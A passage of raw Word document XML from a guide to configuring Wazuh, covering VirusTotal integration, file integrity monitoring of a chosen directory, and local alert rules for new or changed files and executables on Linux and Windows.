            <w:tcW w:w="9062" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="755FECDF" w14:textId="6E4E2378" w:rsidR="00B9630D" w:rsidRPr="00AD2791" w:rsidRDefault="00B9630D" w:rsidP="00AD2791">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD2791">
              <w:t>&lt;integration&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C0F2F01" w14:textId="77777777" w:rsidR="00B9630D" w:rsidRPr="00AD2791" w:rsidRDefault="00B9630D" w:rsidP="00AD2791">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD2791">
              <w:t xml:space="preserve">    &lt;name&gt;virustotal&lt;/name&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D8B2D46" w14:textId="08A44A07" w:rsidR="00B9630D" w:rsidRPr="00AD2791" w:rsidRDefault="00B9630D" w:rsidP="00AD2791">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD2791">
              <w:t xml:space="preserve">    &lt;api_key&gt;VirusTotal API key&lt;/api_key&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F54D6A3" w14:textId="77777777" w:rsidR="00B9630D" w:rsidRPr="00AD2791" w:rsidRDefault="00B9630D" w:rsidP="00AD2791">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD2791">
              <w:t xml:space="preserve">    &lt;group&gt;syscheck&lt;/group&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44BAD699" w14:textId="77777777" w:rsidR="00B9630D" w:rsidRPr="00AD2791" w:rsidRDefault="00B9630D" w:rsidP="00AD2791">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD2791">
              <w:t xml:space="preserve">    &lt;alert_format&gt;json&lt;/alert_format&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26E18E02" w14:textId="77A2850F" w:rsidR="00B9630D" w:rsidRPr="00AD2791" w:rsidRDefault="00B9630D" w:rsidP="00AD2791">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD2791">
              <w:t>&lt;/integration&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3AA28EA5" w14:textId="77777777" w:rsidR="00AC61CB" w:rsidRDefault="00AC61CB" w:rsidP="00A563D9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E1EB69B" w14:textId="1246A131" w:rsidR="00A563D9" w:rsidRDefault="00857896" w:rsidP="00A563D9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC61CB">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="009E633B">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00A563D9" w:rsidRPr="00A563D9">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Using FIM to monitor a </w:t>
      </w:r>
      <w:r w:rsidR="00A563D9">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">specific </w:t>
      </w:r>
      <w:r w:rsidR="00A563D9" w:rsidRPr="00A563D9">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>directory</w:t>
      </w:r>
      <w:r w:rsidR="00A563D9">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> (File</w:t>
      </w:r>
      <w:r w:rsidR="00A563D9" w:rsidRPr="00A563D9">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> integrity monitoring</w:t>
      </w:r>
      <w:r w:rsidR="00A563D9">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57771028" w14:textId="50E1095C" w:rsidR="009E633B" w:rsidRPr="00AA264C" w:rsidRDefault="00BF1E0E" w:rsidP="00AA264C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="00A563D9" w:rsidRPr="00A563D9">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>n the Wazuh server and the Wazuh agent</w:t>
      </w:r>
      <w:r w:rsidR="004449CF">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the</w:t>
      </w:r>
      <w:r w:rsidR="00A563D9" w:rsidRPr="00A563D9">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidR="00A563D9" w:rsidRPr="00A563D9">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>/var/ossec/etc/ossec.conf</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00A563D9" w:rsidRPr="00A563D9">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t> file</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Grilledutableau"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9062"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A563D9" w:rsidRPr="00AA264C" w14:paraId="5EA5F185" w14:textId="77777777" w:rsidTr="00AD2791">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="770F3822" w14:textId="77777777" w:rsidR="00A563D9" w:rsidRPr="00AA264C" w:rsidRDefault="00A563D9" w:rsidP="00AD2791">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00AA264C">
              <w:t>&lt;syscheck&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DE96C5C" w14:textId="241EFDF2" w:rsidR="00A563D9" w:rsidRPr="00AA264C" w:rsidRDefault="00A563D9" w:rsidP="00AD2791">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00AA264C">
              <w:t xml:space="preserve">  &lt;directories check_all="yes" realtime="yes"&gt;/directory to monitor &lt;/directories&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="729F26F1" w14:textId="1EEED094" w:rsidR="00A563D9" w:rsidRPr="00AA264C" w:rsidRDefault="00A563D9" w:rsidP="00AD2791">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00AA264C">
              <w:t>&lt;/syscheck&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5B4DE289" w14:textId="77777777" w:rsidR="00AD2791" w:rsidRDefault="00AD2791" w:rsidP="00A563D9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BD57CE0" w14:textId="0B239D00" w:rsidR="00AD2791" w:rsidRDefault="00AD2791" w:rsidP="00A563D9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>3- A</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD2791">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>dd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD2791">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> the necessary rules to generate alerts</w:t>
      </w:r>
      <w:r w:rsidR="004639E5">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> ( /</w:t>
      </w:r>
      <w:r w:rsidR="004639E5" w:rsidRPr="004639E5">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>var/ossec/etc/rules/local_rules.xml</w:t>
      </w:r>
      <w:r w:rsidR="004639E5">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Grilledutableau"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9062"/>
      </w:tblGrid>
      <w:tr w:rsidR="004449CF" w14:paraId="5D76146D" w14:textId="77777777" w:rsidTr="004449CF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="32D63D88" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004449CF">
              <w:t>&lt;!-- Cross-platform FIM and VirusTotal rules --&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60035DF3" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004449CF">
              <w:t>&lt;group name="syscheck,virustotal"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C38216B" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="10670687" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004449CF">
              <w:t xml:space="preserve">  &lt;!-- Linux FIM monitoring --&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B7217DF" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004449CF">
              <w:t xml:space="preserve">  &lt;rule id="100200" level="7"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="430AB402" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004449CF">
              <w:t xml:space="preserve">    &lt;if_sid&gt;550&lt;/if_sid&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CA87D15" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004449CF">
              <w:t xml:space="preserve">    &lt;field name="file"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36D345A1" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004449CF">
              <w:t xml:space="preserve">      &lt;match&gt;^/tmp/apps/.*&lt;/match&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6222F166" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004449CF">
              <w:t xml:space="preserve">    &lt;/field&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7193D3EE" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004449CF">
              <w:t xml:space="preserve">    &lt;description&gt;File modified in /tmp/apps directory (Linux).&lt;/description&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F3657A8" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004449CF">
              <w:t xml:space="preserve">  &lt;/rule&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72CDAE28" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="579F2479" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004449CF">
              <w:t xml:space="preserve">  &lt;rule id="100201" level="7"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F471E30" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004449CF">
              <w:t xml:space="preserve">    &lt;if_sid&gt;554&lt;/if_sid&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="365DBDF4" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004449CF">
              <w:t xml:space="preserve">    &lt;field name="file"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="454CFB0E" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004449CF">
              <w:t xml:space="preserve">      &lt;match&gt;^/tmp/apps/.*&lt;/match&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35481184" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004449CF">
              <w:t xml:space="preserve">    &lt;/field&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28D4CF18" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004449CF">
              <w:t xml:space="preserve">    &lt;description&gt;File added to /tmp/apps directory (Linux).&lt;/description&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="071992E8" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004449CF">
              <w:t xml:space="preserve">  &lt;/rule&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B2570D2" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="66661E60" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004449CF">
              <w:t xml:space="preserve">  &lt;rule id="100210" level="10"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76A82CE7" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004449CF">
              <w:t xml:space="preserve">    &lt;if_sid&gt;550&lt;/if_sid&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CCF8691" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004449CF">
              <w:t xml:space="preserve">    &lt;field name="file"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="306A2AD7" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004449CF">
              <w:t xml:space="preserve">      &lt;match&gt;.*\.(sh|py|exe|dll|bin)$&lt;/match&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73FA3C7D" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004449CF">
              <w:t xml:space="preserve">    &lt;/field&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61EF8510" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004449CF">
              <w:t xml:space="preserve">    &lt;description&gt;Executable/script file modified — sending hash to VirusTotal (Linux).&lt;/description&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CD0A82E" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004449CF">
              <w:t xml:space="preserve">  &lt;/rule&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BD0BFBC" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="02584CAB" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004449CF">
              <w:t xml:space="preserve">  &lt;rule id="100211" level="10"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1081E689" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004449CF">
              <w:t xml:space="preserve">    &lt;if_sid&gt;554&lt;/if_sid&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6275C1E7" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004449CF">
              <w:t xml:space="preserve">    &lt;field name="file"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A9CAB3C" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004449CF">
              <w:t xml:space="preserve">      &lt;match&gt;.*\.(sh|py|exe|dll|bin)$&lt;/match&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4762015A" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004449CF">
              <w:t xml:space="preserve">    &lt;/field&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15DAAA65" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004449CF">
              <w:t xml:space="preserve">    &lt;description&gt;New executable/script file detected — sending hash to VirusTotal (Linux).&lt;/description&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00C7B039" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004449CF">
              <w:t xml:space="preserve">  &lt;/rule&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07C031C8" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="73428C89" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004449CF">
              <w:t xml:space="preserve">  &lt;!-- Windows FIM monitoring --&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B166907" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004449CF">
              <w:t xml:space="preserve">  &lt;rule id="110200" level="7"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05C82084" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004449CF">
              <w:t xml:space="preserve">    &lt;if_sid&gt;550&lt;/if_sid&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69941BCD" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004449CF">
              <w:t xml:space="preserve">    &lt;field name="file"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71FB7BFC" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004449CF">
              <w:t xml:space="preserve">      &lt;match&gt;^C:\\apps\\.*&lt;/match&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57D05DB1" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004449CF">
              <w:t xml:space="preserve">    &lt;/field&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FA745E9" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004449CF">
              <w:t xml:space="preserve">    &lt;description&gt;File modified in C:\apps directory (Windows).&lt;/description&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F31EA16" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004449CF">
              <w:t xml:space="preserve">  &lt;/rule&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38EE444E" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="27BF36FC" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004449CF">
              <w:t xml:space="preserve">  &lt;rule id="110201" level="7"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DAD226F" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004449CF">
              <w:t xml:space="preserve">    &lt;if_sid&gt;554&lt;/if_sid&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="260EE1B4" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004449CF">
              <w:t xml:space="preserve">    &lt;field name="file"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23F58717" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004449CF">
              <w:t xml:space="preserve">      &lt;match&gt;^C:\\apps\\.*&lt;/match&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D4C48E3" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004449CF">
              <w:t xml:space="preserve">    &lt;/field&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1294E38A" w14:textId="77777777" w:rsidR="004449CF" w:rsidRPr="004449CF" w:rsidRDefault="004449CF" w:rsidP="004449CF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004449CF">
              <w:t xml:space="preserve">    &lt;description&gt;File added to C:\apps directory (Windows).&lt;/description&gt;</w:t>
            </w:r>
          </w:p>
